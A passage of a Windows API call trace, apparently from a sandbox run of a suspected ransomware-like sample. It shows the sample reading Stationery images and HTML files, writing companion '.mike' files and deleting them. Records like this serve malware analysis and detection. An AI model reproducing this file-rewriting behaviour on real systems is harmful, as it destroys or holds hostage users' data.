nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a6094*, lpNumberOfBytesRead=0x2af0c8*=0xed, lpOverlapped=0x0) returned 1 [0053.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.660] GetFileType (hFile=0x288) returned 0x1 [0053.660] GetFileType (hFile=0x288) returned 0x1 [0053.660] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.660] WriteFile (in: hFile=0x288, lpBuffer=0x21a9330*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21a9330*, lpNumberOfBytesWritten=0x2af0bc*=0xf0, lpOverlapped=0x0) returned 1 [0053.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.661] GetFileType (hFile=0x288) returned 0x1 [0053.661] GetFileType (hFile=0x288) returned 0x1 [0053.662] WriteFile (in: hFile=0x288, lpBuffer=0x21ac570*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21ac570*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm", dwFileAttributes=0x80) returned 0 [0053.663] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.mike")) returned 1 [0053.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.666] GetFileType (hFile=0x288) returned 0x1 [0053.666] GetFileType (hFile=0x288) returned 0x1 [0053.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.667] GetFileType (hFile=0x288) returned 0x1 [0053.667] GetFileType (hFile=0x288) returned 0x1 [0053.667] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.667] WriteFile (in: hFile=0x288, lpBuffer=0x21b1da4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21b1da4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.668] GetFileType (hFile=0x288) returned 0x1 [0053.669] GetFileType (hFile=0x288) returned 0x1 [0053.669] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.669] ReadFile (in: hFile=0x288, lpBuffer=0x21b2ee0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b2ee0*, lpNumberOfBytesRead=0x2af0c8*=0x18ed, lpOverlapped=0x0) returned 1 [0053.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.671] GetFileType (hFile=0x288) returned 0x1 [0053.671] GetFileType (hFile=0x288) returned 0x1 [0053.671] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.671] GetFileType (hFile=0x288) returned 0x1 [0053.671] GetFileType (hFile=0x288) returned 0x1 [0053.672] WriteFile (in: hFile=0x288, lpBuffer=0x21c155c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21c155c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x80) returned 0 [0053.674] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.mike")) returned 1 [0053.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.678] GetFileType (hFile=0x288) returned 0x1 [0053.678] GetFileType (hFile=0x288) returned 0x1 [0053.678] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.679] GetFileType (hFile=0x288) returned 0x1 [0053.679] GetFileType (hFile=0x288) returned 0x1 [0053.679] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.679] WriteFile (in: hFile=0x288, lpBuffer=0x21c6ab4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21c6ab4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.680] GetFileType (hFile=0x288) returned 0x1 [0053.680] GetFileType (hFile=0x288) returned 0x1 [0053.680] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.680] ReadFile (in: hFile=0x288, lpBuffer=0x21c7bd8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c7bd8*, lpNumberOfBytesRead=0x2af0c8*=0xe8, lpOverlapped=0x0) returned 1 [0053.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.681] GetFileType (hFile=0x288) returned 0x1 [0053.681] GetFileType (hFile=0x288) returned 0x1 [0053.681] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.681] WriteFile (in: hFile=0x288, lpBuffer=0x21cae58*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21cae58*, lpNumberOfBytesWritten=0x2af0bc*=0xf0, lpOverlapped=0x0) returned 1 [0053.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.682] GetFileType (hFile=0x288) returned 0x1 [0053.682] GetFileType (hFile=0x288) returned 0x1 [0053.683] WriteFile (in: hFile=0x288, lpBuffer=0x21ce080*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21ce080*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm", dwFileAttributes=0x80) returned 0 [0053.684] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.mike")) returned 1 [0053.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.688] GetFileType (hFile=0x288) returned 0x1 [0053.688] GetFileType (hFile=0x288) returned 0x1 [0053.688] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.688] GetFileType (hFile=0x288) returned 0x1 [0053.689] GetFileType (hFile=0x288) returned 0x1 [0053.689] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.689] WriteFile (in: hFile=0x288, lpBuffer=0x21d3650*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21d3650*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.690] GetFileType (hFile=0x288) returned 0x1 [0053.690] GetFileType (hFile=0x288) returned 0x1 [0053.690] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.690] ReadFile (in: hFile=0x288, lpBuffer=0x21d4774, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21d4774*, lpNumberOfBytesRead=0x2af0c8*=0x13fb, lpOverlapped=0x0) returned 1 [0053.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.692] GetFileType (hFile=0x288) returned 0x1 [0053.692] GetFileType (hFile=0x288) returned 0x1 [0053.692] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.692] GetFileType (hFile=0x288) returned 0x1 [0053.692] GetFileType (hFile=0x288) returned 0x1 [0053.693] WriteFile (in: hFile=0x288, lpBuffer=0x21e1020*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21e1020*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg", dwFileAttributes=0x80) returned 0 [0053.695] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.mike")) returned 1 [0053.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.698] GetFileType (hFile=0x288) returned 0x1 [0053.698] GetFileType (hFile=0x288) returned 0x1 [0053.698] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.698] GetFileType (hFile=0x288) returned 0x1 [0053.698] GetFileType (hFile=0x288) returned 0x1 [0053.698] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.699] WriteFile (in: hFile=0x288, lpBuffer=0x21e66e0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21e66e0*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.701] GetFileType (hFile=0x288) returned 0x1 [0053.701] GetFileType (hFile=0x288) returned 0x1 [0053.701] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.701] ReadFile (in: hFile=0x288, lpBuffer=0x21e7814, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21e7814*, lpNumberOfBytesRead=0x2af0c8*=0xf8d, lpOverlapped=0x0) returned 1 [0053.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.703] GetFileType (hFile=0x288) returned 0x1 [0053.703] GetFileType (hFile=0x288) returned 0x1 [0053.703] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.703] WriteFile (in: hFile=0x288, lpBuffer=0x21f0414*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21f0414*, lpNumberOfBytesWritten=0x2af0bc*=0xf90, lpOverlapped=0x0) returned 1 [0053.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.704] GetFileType (hFile=0x288) returned 0x1 [0053.704] GetFileType (hFile=0x288) returned 0x1 [0053.705] WriteFile (in: hFile=0x288, lpBuffer=0x21f364c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21f364c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg", dwFileAttributes=0x80) returned 0 [0053.706] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.mike")) returned 1 [0053.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.709] GetFileType (hFile=0x288) returned 0x1 [0053.709] GetFileType (hFile=0x288) returned 0x1 [0053.709] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.710] GetFileType (hFile=0x288) returned 0x1 [0053.710] GetFileType (hFile=0x288) returned 0x1 [0053.710] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.710] WriteFile (in: hFile=0x288, lpBuffer=0x21f8e70*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21f8e70*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.711] GetFileType (hFile=0x288) returned 0x1 [0053.711] GetFileType (hFile=0x288) returned 0x1 [0053.711] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.711] ReadFile (in: hFile=0x288, lpBuffer=0x21f9fb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f9fb4*, lpNumberOfBytesRead=0x2af0c8*=0x13fb, lpOverlapped=0x0) returned 1 [0053.713] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.769] GetFileType (hFile=0x288) returned 0x1 [0053.769] GetFileType (hFile=0x288) returned 0x1 [0053.769] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.770] GetFileType (hFile=0x288) returned 0x1 [0053.770] GetFileType (hFile=0x288) returned 0x1 [0053.771] WriteFile (in: hFile=0x288, lpBuffer=0x2206890*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2206890*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg", dwFileAttributes=0x80) returned 0 [0053.772] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.mike")) returned 1 [0053.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft 